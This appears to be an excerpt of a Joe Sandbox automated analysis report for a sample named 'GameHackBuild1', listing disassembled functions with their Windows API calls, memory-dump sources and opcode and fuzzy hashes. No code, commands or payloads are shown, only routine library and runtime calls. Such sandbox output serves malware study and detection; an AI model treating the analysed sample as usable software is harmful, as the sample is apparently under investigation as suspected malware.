                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: d4fdf9156f9b882d9adeff7a68a05321b3815a73d830f9a0576bff0393ec6cd2
                                      • Instruction ID: d2dc5953ee29f03ad54ff90482c65888000db43d516bb59add777f4b75bf7d7f
                                      • Opcode Fuzzy Hash: d4fdf9156f9b882d9adeff7a68a05321b3815a73d830f9a0576bff0393ec6cd2
                                      • Instruction Fuzzy Hash: C021E6B1E40216AFDB14DF64DD45BAB766CFB04314F04063AE919DB681E770D99087A8
                                      Function 00A01E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A01E05
                                        • Part of subcall function 00A03B3D: __EH_prolog.LIBCMT ref: 00A03B42
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: ab01f121681e031170a9e2546754e817968698fc2297626278674c5d3950da56
                                      • Instruction ID: 3b14fdab2d3f7ad3e7e633e13923daa3172ffdaa8a8ca82c7dd6f54020d35d5f
                                      • Opcode Fuzzy Hash: ab01f121681e031170a9e2546754e817968698fc2297626278674c5d3950da56
                                      • Instruction Fuzzy Hash: DE2117729041099FCF15EFA9EA519EEBBF6BF58300B1004ADE845A7291CB325E54CB60
                                      Function 00A1A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A1A7C8
                                        • Part of subcall function 00A01380: __EH_prolog.LIBCMT ref: 00A01385
                                        • Part of subcall function 00A01380: new.LIBCMT ref: 00A013FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: ea36e66be1a603e2caf8cf014386ddbb8d0f8508c5da18bb6d543d9f48159a0a
                                      • Instruction ID: 396a09b11c412273ea573703b666c00797cbc4c6fbf8198fecbb967d52fed6eb
                                      • Opcode Fuzzy Hash: ea36e66be1a603e2caf8cf014386ddbb8d0f8508c5da18bb6d543d9f48159a0a
                                      • Instruction Fuzzy Hash: B6218E71C0529D9ECF15DF98DA529EEB7F4EF19300F0004AEE809A7242DB356E46CBA1
                                      Function 00A092E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: af5d402b1601b0b7d63fa0f40eba062bdd889175d9b628e434a3ddcb867f33d9
                                      • Instruction ID: 5d343409c0c7dca282b444ee1c4f8c67dcb819969acdec6b0bb9ad8a0e71a52e
                                      • Opcode Fuzzy Hash: af5d402b1601b0b7d63fa0f40eba062bdd889175d9b628e434a3ddcb867f33d9
                                      • Instruction Fuzzy Hash: E211A573E0052C9BCF26AFA8DD519DEB736EF48750F044219FC14BB2D2CA349D108AA1
                                      Function 00A05BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A05BDC
                                        • Part of subcall function 00A0B07D: __EH_prolog.LIBCMT ref: 00A0B082
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: b50b3d6bd701d0beb458c94d6300f0e67c7f6dd5374bd46547eb83d30168ff76
                                      • Instruction ID: 5ecba704122aa602bc4cb102d1ebd02f4dc0feb4b7d08a706f570771b167a84a
                                      • Opcode Fuzzy Hash: b50b3d6bd701d0beb458c94d6300f0e67c7f6dd5374bd46547eb83d30168ff76
                                      • Instruction Fuzzy Hash: DC01AD30A10688DEC724F7B4E2553DEFBA49F5A300F40409EE85E232C3CBB01B08C662
                                      Function 00A28518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23A26,?,0000015D,?,?,?,?,00A24F02,000000FF,00000000,?,?), ref: 00A2854A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 690a71c2c688b8dcda2bb150e8f9d2dcc63aa879bde6f92544f9a0a010c6fec1
                                      • Instruction ID: 44bad18eb7361c77ffbf64e0cb2b87a97493df0d281e1fefe54d7ecbe0200c66
                                      • Opcode Fuzzy Hash: 690a71c2c688b8dcda2bb150e8f9d2dcc63aa879bde6f92544f9a0a010c6fec1
                                      • Instruction Fuzzy Hash: 20E0ED316872319AEB312BADBD00B9A7BDC9F417B0F180230FC18A6092CF2CCC0185E5
                                      Function 00A0A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A0A4F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: 807a30b5460c59640f738153ea80f7c27187340bf9f9d5b8e764821789da4a8d
                                      • Instruction ID: 3782f38251df6639be118aecc3be1892daa452ab2b89fbf7ad6c422611a5eba4
                                      • Opcode Fuzzy Hash: 807a30b5460c59640f738153ea80f7c27187340bf9f9d5b8e764821789da4a8d
                                      • Instruction Fuzzy Hash: 98F0E935008384AACA225BB85D047C77BA0AF26371F04CA09F1FD021D1C37524959723
                                      Function 00A1067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00A106B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ExecutionStateThread
                                      • String ID:
                                      • API String ID: 2211380416-0
                                      • Opcode ID: d3937f8258783239c7f6312c5ccfbdeab76fbeee14e5f844d82e2a1184148b60
                                      • Instruction ID: e14409d0294e11ebed6941a5af6d40ae03e8e3449771df83bcec445141d395fa
                                      • Opcode Fuzzy Hash: d3937f8258783239c7f6312c5ccfbdeab76fbeee14e5f844d82e2a1184148b60
                                      • Instruction Fuzzy Hash: 77D0C22920411029CA253364AA09BFE2A060FC3714F0C0021F61D575C78A9608CA62A2
                                      Function 00A19D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GdipAlloc.GDIPLUS(00000010), ref: 00A19D81
                                        • Part of subcall function 00A19B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A19B30
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                      • String ID:
                                      • API String ID: 1915507550-0
                                      • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                      • Instruction ID: 238df74898c8de98bfc00f627e97eff4fb9d0d3f942ca72e372b6cf407f6d40c
                                      • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                      • Instruction Fuzzy Hash: E1D0C73065820D7ADF41BB759D229FB7BB9DB04350F108165BC0886151FD71DE90E661
                                      Function 00A09989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileType.KERNELBASE(000000FF,00A09887), ref: 00A09995
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 52f22c30f8cd619445443d8908b4b4a3bd23a3077362dc37d7947eafc885141b
                                      • Instruction ID: a072fa240222655171b207ca7e5eba075baa7ecb24c340344813534e78e135b3
                                      • Opcode Fuzzy Hash: 52f22c30f8cd619445443d8908b4b4a3bd23a3077362dc37d7947eafc885141b
                                      • Instruction Fuzzy Hash: 51D01232111144A6CF2587386D090DB7751DB833F6B38C6E8E025C40F2D723C903F581
                                      Function 00A1D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00A1D43F
                                        • Part of subcall function 00A1AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1AC85
                                        • Part of subcall function 00A1AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1AC96
                                        • Part of subcall function 00A1AC74: IsDialogMessageW.USER32(00010444,?), ref: 00A1ACAA
                                        • Part of subcall function 00A1AC74: TranslateMessage.USER32(?), ref: 00A1ACB8
                                        • Part of subcall function 00A1AC74: DispatchMessageW.USER32(?), ref: 00A1ACC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                      • String ID:
                                      • API String ID: 897784432-0
                                      • Opcode ID: 36a67101e1566cecfb6bba2a1ca5521d56d10480906a2747b4f984c71aebe25f
                                      • Instruction ID: 8dc79f324e7f0deaee4b8ae128423b44368f6dfdf71517e7bd971090af6f7779
                                      • Opcode Fuzzy Hash: 36a67101e1566cecfb6bba2a1ca5521d56d10480906a2747b4f984c71aebe25f
                                      • Instruction Fuzzy Hash: 8CD09E35144300ABD6116B91DF06F0F7AB6AB99B04F004A54B344740F286629D21AB16
                                      Function 00A1D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 867d358ea7b497519e3dd638de8c252f4d0676779f4a20531a0a582a7a836ca8
                                      • Instruction ID: 6c10deac9d0c36215d4a13f76012c781e9c18fb43fdcb33220e813d7bb662db7
                                      • Opcode Fuzzy Hash: 867d358ea7b497519e3dd638de8c252f4d0676779f4a20531a0a582a7a836ca8
                                      • Instruction Fuzzy Hash: 7CB012B527C5017C310C61046E42E7B022DE5C2B10330491AB20AD00C0D4405C850631
                                      Function 00A1D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 6f8145e542bba61420f04defa8691edff779d21e1d1feaae1e7d5a471d9a31af
                                      • Instruction ID: 49144d98eeaa2e63b6415b74d7c73f91e111b0744c1a2f434064e1e67e112e2c
                                      • Opcode Fuzzy Hash: 6f8145e542bba61420f04defa8691edff779d21e1d1feaae1e7d5a471d9a31af
                                      • Instruction Fuzzy Hash: 7FB012F127C4017C310C61046E02E76022DC5C3B10330C91AB60AE01C0D4405C8A0531
                                      Function 00A1D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 33afb5664f8c3eec44826d8901d83fdc4f560fb5b4cdf77ac1281c984dba8cec
                                      • Instruction ID: c4ec0957e5a89ea15043e9f933d4267f7e23f78a507d52a26dabff5eb516fb40
                                      • Opcode Fuzzy Hash: 33afb5664f8c3eec44826d8901d83fdc4f560fb5b4cdf77ac1281c984dba8cec
                                      • Instruction Fuzzy Hash: 98B012B527C7017D310C21006E52D7B022DC5C3B503304E2AB20AE00C0D4405CC94431
                                      Function 00A1D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: d67130026a178a7067726eb64291144a836cf0e85359e66e4dbb44c31e86748d
                                      • Instruction ID: 87d5b81405fa7a74027c6304b5ca1f004b5af7c99228b45605d9123cce84097a
                                      • Opcode Fuzzy Hash: d67130026a178a7067726eb64291144a836cf0e85359e66e4dbb44c31e86748d
                                      • Instruction Fuzzy Hash: C1B012B127C5017D314C61046E02E76022DC5C2B503304A1AB10ED00C0D4405DC50531
                                      Function 00A1D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 23f56006461658712312574a15a3e1021faff7da028fa22f0dc6253a9fd9507a
                                      • Instruction ID: 06b062357a93692d9ae6737cc9d1bd5116f8765854cfd1e8ca10a57a0dbf8723
                                      • Opcode Fuzzy Hash: 23f56006461658712312574a15a3e1021faff7da028fa22f0dc6253a9fd9507a
                                      • Instruction Fuzzy Hash: 1DB012B127C4017C310C61046F02E76022DC5C2B10330491AB10ED00C0D4405E860531
                                      Function 00A1D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
